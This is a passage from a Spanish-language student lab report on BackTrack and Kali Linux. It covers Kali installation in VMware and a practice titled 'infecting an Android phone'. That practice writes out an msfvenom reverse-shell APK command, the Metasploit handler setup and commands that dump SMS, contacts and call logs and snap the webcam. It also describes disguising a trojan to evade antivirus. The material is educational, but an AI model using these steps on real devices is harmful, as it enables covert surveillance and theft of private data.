Existen muchos comando más con otras funciones, en caso de no contar con
una lista de ellos, basta con introducir el comando “help”.
Para finalizar la comunicación con la victima basta con presionar nuevamente el
comando “exit”.
Resultados.
A través del sistema operativo Back Track 5 r3 se logró monitorear equipos de
cómputo que mantenían una conexión en red, sin importar que la conexión fuera
a través de wi-fi o cableada.
Se creó un virus troyano gracias la herramienta Metaexploit, el troyano permite
la conexión entre equipos, la computadora víctima y el atacante.
Dando acceso completo al computador atacante en actividades como prender la
cámara de forma remota, acceder a los archivos dentro del disco duro, crear,
borrar, editar, leer y eliminar archivos. Incluso ver los procesos activos o las
versiones y el tipo de software instalado.
La práctica fue totalmente funcional, fue probada en Windows 7, 8.1 y 10.
68
Imagen 71 Logo Windows 7
Imagen 72 Logo Windows 8.1
Imagen 73 Logo Windows 10
Hallando al antivirus como una desventaja, siendo capaz de eliminar el virus.
Por lo cual se exploró la posibilidad de disfrazar el virus como un archivo más en
el computador. Permitiendo que fuera indetectable, teniendo una infiltración sin
obstrucciones.
Conclusión.
Es importante el monitoreo en red, depende de los fines para los que se use.
Monitorear como lo hacen las grandes empresas para tomar decisiones respecto
a las horas laborales de sus empleados. Por otra parte el monitoreo sin
consentimiento es ilegal. Existen diferentes programas o herramientas que
permiten el monitoreo en red con muchas ventajas.
El uso de back Track nos permitió tener el monitoreo desde otro enfoque, tener
en cuenta la seguridad de nuestra información y los vulnerables que se puede
pueden volver nuestros equipos en un ambiente laboral, como el personal.
Referencias
Blogspot. (s.f.). Recuperado el 14 de Octubre de 2015, de
http://infomed66.blogspot.com.es/2015/02/backtrack-5-r3-version-completa-del.html
Instalación de Back Track 5 r3. (s.f.). Recuperado el 14 de Octubre de 2015, de
http://www.backtrack-linux.org/backtrack/backtrack-5-r3-released/
Página oficial de Back Track. (s.f.). Recuperado el 13 de Octubre de 2015, de
http://www.backtrack-linux.org/backtrack/backtrack-5-r3-released/
Unidas, N. (2002). Manual sobre programas de prevención del uso indebido de drogas con
participación de los jóvenes. Nueva York: Oficina de las Naciones Unidas de
Fiscalización de Drogas y Prevención del Delito.
Youtube. (s.f.). Recuperado el 16 de Octubre de 2015, de
https://www.youtube.com/watch?v=2u86qAH3Iek
Youtube. (s.f.). Recuperado el 17 de Octubre de 2015, de
https://www.youtube.com/watch?v=z55LdIZnSz0
70
Kali Linux.
Kali Linux es una distribución basada en Debian GNU/Linux diseñada
principalmente para la auditoría y seguridad informática en general. Fue fundada
y es mantenida por Offensive Security Ltd. Mati Aharoni and Devon Kearns,
ambos pertenecientes al equipo de Offensive Security, desarrollaron la
distribución a partir de la reescritura de BackTrack, que se podría denominar
como la antecesora de Kali Linux.
Kali Linux trae preinstalados más de 600 programas incluyendo Nmap (un
escáner de puertos), Wireshark (un sniffer), John the Ripper (un crackeador de
passwords) y la suite Aircrack-ng (software para pruebas de seguridad en redes
inalámbricas). Kali puede ser usado desde un Live CD, live-usb y también puede
ser instalada como sistema operativo principal.
Kali se distribuye en imágenes ISO compiladas para diferentes arquitecturas
(32/64 bits y ARM), y trabaja bajo licencia GPL (licencia pública general).
Instalación de Kali Linux en Vmware Workstation 11.0
Requisitos de instalación de Kali Linux.
Un mínimo de 8 GB de espacio en disco para la instalación de Kali Linux.
Para las arquitecturas i386 y amd64, un mínimo de 1GB de RAM.
Tener instalado Vmware Workstation 11.0
Para poder comenzar la instalación es necesario descargar el software adecuado a la
arquitectura de su computadora, Ya sea de 32 o 64 bits.
En esta ocasión utilizamos una computadora con arquitectura de 64 bits por lo tanto la ISO es
de 64.
Descargamos el software del siguiente link:
https://www.kali.org/downloads/
Ilustración 57 Descarga de Kali Linux
Una vez descargado la ISO vamos a crear la máquina virtual en Vmware Workstation.
1.- Abrimos el software Vmware Workstatiton y selecionamos en el menú la opción file dentro
de file seleccionar new virtual machine.
Ilustración 58 Creación de la máquina virtual.
2.- En la siguiente pantalla seleccionaremos Custom y click en siguiente.
72
Ilustración 59 Creación de la máquina virtual 1.2
3.- Le damos click en next.
Ilustración 60 Creación de la máquina virtual 1.3
4.- seleccionaremos la ISO de Kali Linux y le daremos click en next.
Ilustración 61 Creación de la máquina virtual 1.4
5.- Seleccionaremos el sistema operativo Linux y su versión, en este caso le puedes dejar las
opciones predeterminadas y le daremos click en next.
Ilustración 62 Creación de la máquina virtual.1.5
6.- Damos un nombre a la máquina virtual y seleccionamos la ubicación de donde se va a guardar
la instalación, podemos también dejar las opciones que nos de por defecto y le daremos click en
next.
74
Ilustración 63 Creación de la máquina virtual.1.7
7.-En la siguiente pantalla seleccionaremos el número de procesadores y el número de cores
del mismo. Esta parte ya depende de la arquitectura de la computadora de lo que pueda
disponer, en este caso tiene un procesador i3 y le daremos click en next.
Ilustración 64 Creación de la máquina virtual.1.8
8.- Seleccionaremos la cantidad de memoria RAM que deseamos que tenga la máquina virtual,
esta parte también depende mucho de las capacidades de la computadora, en este caso se
cuenta con una memoria de 8GB de ram por lo tanto se seleccionó 4GB y le daremos click en
next.
Ilustración 65 Creación de la máquina virtual.1.9
9.-En la siguiente pantalla tendremos que seleccionar el tipo de conexión de red que deseemos
y le daremos click en next.
Ilustración 66 Creación de la máquina virtual.1.10
10.- En esta ventana dejamos las opciones por defecto y le daremos click en next.
76
Ilustración 67 Creación de la máquina virtual.1.11
11.- Creamos un disco duro virtual para que pueda alojar a Kali Linux.En esta parte podemos
dejar la opción predeterminada y dar click en next.
Ilustración 68 Creación de la máquina virtual. 1.12
12.- Seleccionamos el tipo de disco virtual, dejamos la opción por defecto y le damos click en
next.
Ilustración 69 Creación de la máquina virtual.1.13
13.- Seleccionaremos la capacidad del disco virtual, podemos poner una cantidad que ocupemos
o dejar las opciones por defecto.
Ilustración 70 Creación de la máquina virtual.1.14
14.- En esta pantalla dejamos las opciones por defecto y le damos click en next.
Ilustración 71 Creación de la máquina virtual.1.15
15.- En esta pantalla aparece el resumen de toda la configuración de la máquina virtual que esta
por crearse, para finalizar le daremos click en finish y ya tendremos la maquina creada.
78
Ilustración 72 Creación de la máquina virtual.1.16
Después de descargar, crear y configurar la máquina virtual ahora si pasaremos a instalar Kali
Linux.
1.- Encendemos la máquina virtual.
2.- Seleccionaremos la opción de graphical install y le daremos entre.
Ilustración 73 Instalación de Kali Linux.
3.- Seleccionaremos el lenguaje de instalación, buscamos y seleccionamos español y click en
continuar.
Ilustración 74 Instalación de Kali Linux. 1.2
4.- Seleccionaremos la ubicación en este caso es México y click en continuar.
Ilustración 75 Instalación de Kali Linux. 1.3
5.-Configuramos el idioma del teclado, en esta opción seleccionaremos latinoamericano y click
en continuar.
Ilustración 76 Instalación de Kali Linux. 1.4
6.-Esperamos a que cargue todos los componentes y click en continuar.
80
Ilustración 77 Instalación de Kali Linux. 1.5
7.-Esperamos a que configure automáticamente la red y click en continuar.
Ilustración 78 Instalación de Kali Linux. 1.6
8.-En esta pantalla te pide que le des un nombre a la máquina, puedes dejarlo por defecto click
en continuar.
Ilustración 79 Instalación de Kali Linux. 1.7
9.- Te pedirá un nombre para el dominio le puedes colocar uno o dejarle la opción que trae por
defecto y click en continuar.
Ilustración 80 Instalación de Kali Linux. 1.8
10.-Te pedirá que coloques la clave del superusuario o también conocido como root, en este
caso es itesa y le darás click en continuar.
Ilustración 81 Instalación de Kali Linux. 1.9
11.-Esperamos a que configure el reloj automáticamente y click en continuar.
Ilustración 82 Instalación de Kali Linux. 1.10
12.-Seleccionamos la opción que dice Guiado-utilización de todo el disco y le damos click en
continuar.
82
Ilustración 83 Instalación de Kali Linux. 1.11
13.- Seleccionamos el disco, como solo creamos uno damos en continuar.
Ilustración 84 Instalación de Kali Linux. 1.12
14. Podemos dejar la opción por defecto (recomendado para novatos) y click en continuar.
Ilustración 85 Instalación de Kali Linux. 1.13
15. nos muestra las particiones del disco, seleccionamos finalizar el particionado y escribir los
cambios en el disco y click en continuar.
Ilustración 86 Instalación de Kali Linux. 1.14
16. Seleccionamos si para confirmar los cambios en el disco y click en continuar.
Ilustración 87 Instalación de Kali Linux. 1.15
17. Comienza el proceso de formateo del disco e instalación del sistema operativo, esto suele
durar unos minutos.
Ilustración 88 Instalación de Kali Linux. 1.16
18. Seleccionamos no y le damos click en continuar.
84
Ilustración 89 Instalación de Kali Linux. 1.17
19. Esperamos a que configure el gestor de paquetes y le damos click en instalar.
Ilustración 90 Instalación de Kali Linux. 1.18
20. Esperamos a que se instale el cargador de arranque GRUB.
Ilustración 91 Instalación de Kali Linux. 1.19
21. En este caso seleccionamos si y click en continuar.
Ilustración 92 Instalación de Kali Linux. 1.20
22. Esperamos a que finalice la instalación.
Ilustración 93 Instalación de Kali Linux. 1.21
23. Terminar la instalación damos click en continuar.
Ilustración 94 Instalación de Kali Linux. 1.22
24. Se reinicia la máquina virtual.
86
Ilustración 95 Instalación de Kali Linux. 1.23
28. Ya tendremos el kali instalado.
Ilustración 96 Kali Linux instalado escritorio principal
Práctica en Kali Linux
Infectar con un virus un teléfono celular con Android utilizando Kali Linux.
1.- conectamos nuestro equipo de cómputo a internet.
Ilustración 97 Conexión a redes inálambricas
2.- Ejecutamos nuestra máquina virtual la que contiene a Kali Linux.
Ilustración 98 Vista de máquina virtual
3.- Iniciamos sesión con el usuario root e introducimos la contraseña que en este caso es itesa.
Ilustración 99 Login de Kali Linux
Ilustración 100 Login de Kali linux 1.2
88
4.- comprobamos que tengamos internet en la máquina virtual para esto abrimos el navegador
web.
Ilustración 101 Verificación de red.
5.- abrimos un cmd y tecleamos ifconfig para saber que ip tiene la máquina virtual.
Ilustración 102 Checando ip de la máuina virtual.
6.- abrimos una nueva ventana de comandos y tecleamos lo siguiente:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=3333 R >
prueba2.apk
Ilustración 103 Creando apk para el celular
7.- Verificamos que se haya creado la app estará ubicada en la siguiente ruta: en la carpeta de
archivos personales
Ilustración 104 Carpeta de archivos
Ilustración 105 Vista del contenido de Carpeta personal
8.- conectamos nuestro teléfono celular al equipo de cómputo para poder pasarle la app creada.
Ilustración 106 Conexión de teléfono con la pc
90
Ilustración 107 Contenido del celular
9.-abriremos la ventana de metasploit y teclearemos los siguientes comandos:
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.66
set LPORT 3333
show options
exploit
Ilustración 108 Icono de Metasploit
Ilustración 109 Pantalla principal de Metasploit
Ilustración 110 Asignación de dirección y puertos
10.- Ejecutamos la app en el celular.
11.-Se mostrará esta pantalla que indicara cuando ya están conectados.
Ilustración 111 Sincronización entre la pc y el celular
12.- Una vez teniendo comunicación con el teléfono teclearemos cualquiera de estos comandos:
help
dump_calllog
dump_sms
92
check_root
dump_contacts
webcam_snap
webcam_list
13.- Se hicieron las siguientes pruebas con algunos comandos y estos fueron los resultados.
Ilustración 112 Prueba de comandos
Ilustración 113 Prueba del comando dump_calllog
Ilustración 114 Prueba del comando dump_contacts
Ilustración 115 Prueba del comando dump_sms
94
Ilustración 116 Prueba del comando webcam_snap
14.- Por ultimo después de utilizarlo cerramos la conexión.
Ilustración 117 Desconexión entre los equipos
Conclusiones
Se tuvo que investigar desde cero ya que no se tenían conocimientos sobre como instalar kali
Linux ni mucho menos como utilizarlo, después de encontrar como instalarlo hubo que probarlo
instalándolo en equipo físico al igual que también en máquina virtual para comparar resultado,
nos topamos con un problema que en cada versión de Kali Linux varia la escritura de los
comandos para realizar la práctica, una vez que se tenía la sintaxis correcta se puso en marcha
la elaboración de la app para el celular Android y se probaron varios comandos se llegó a la
conclusión que este software es bastante potente, ya que se utiliza en la vida real para
monitorear alguna red y más que nada se centra en la seguridad informática, cuenta con muchas
herramientas que se utilizan para lo ya antes mencionado y que solo le dimos un pequeñísima
demostración de lo que es capaz de hacer este software, lo que más nos agrado es que es
totalmente gratuito a comparación de otros software que solo son de prueba.
Referencias
https://www.kali.org/downloads/
https://www.youtube.com/watch?v=-OCmvFPlJZc
https://siensi.wikispaces.com/file/view/Instalaci%C3%B3n+Kali+Linux+en+VMware.pdf
https://www.youtube.com/watch?v=a4GTzn6uYII
https://www.youtube.com/watch?v=XKB0vx8d4mQ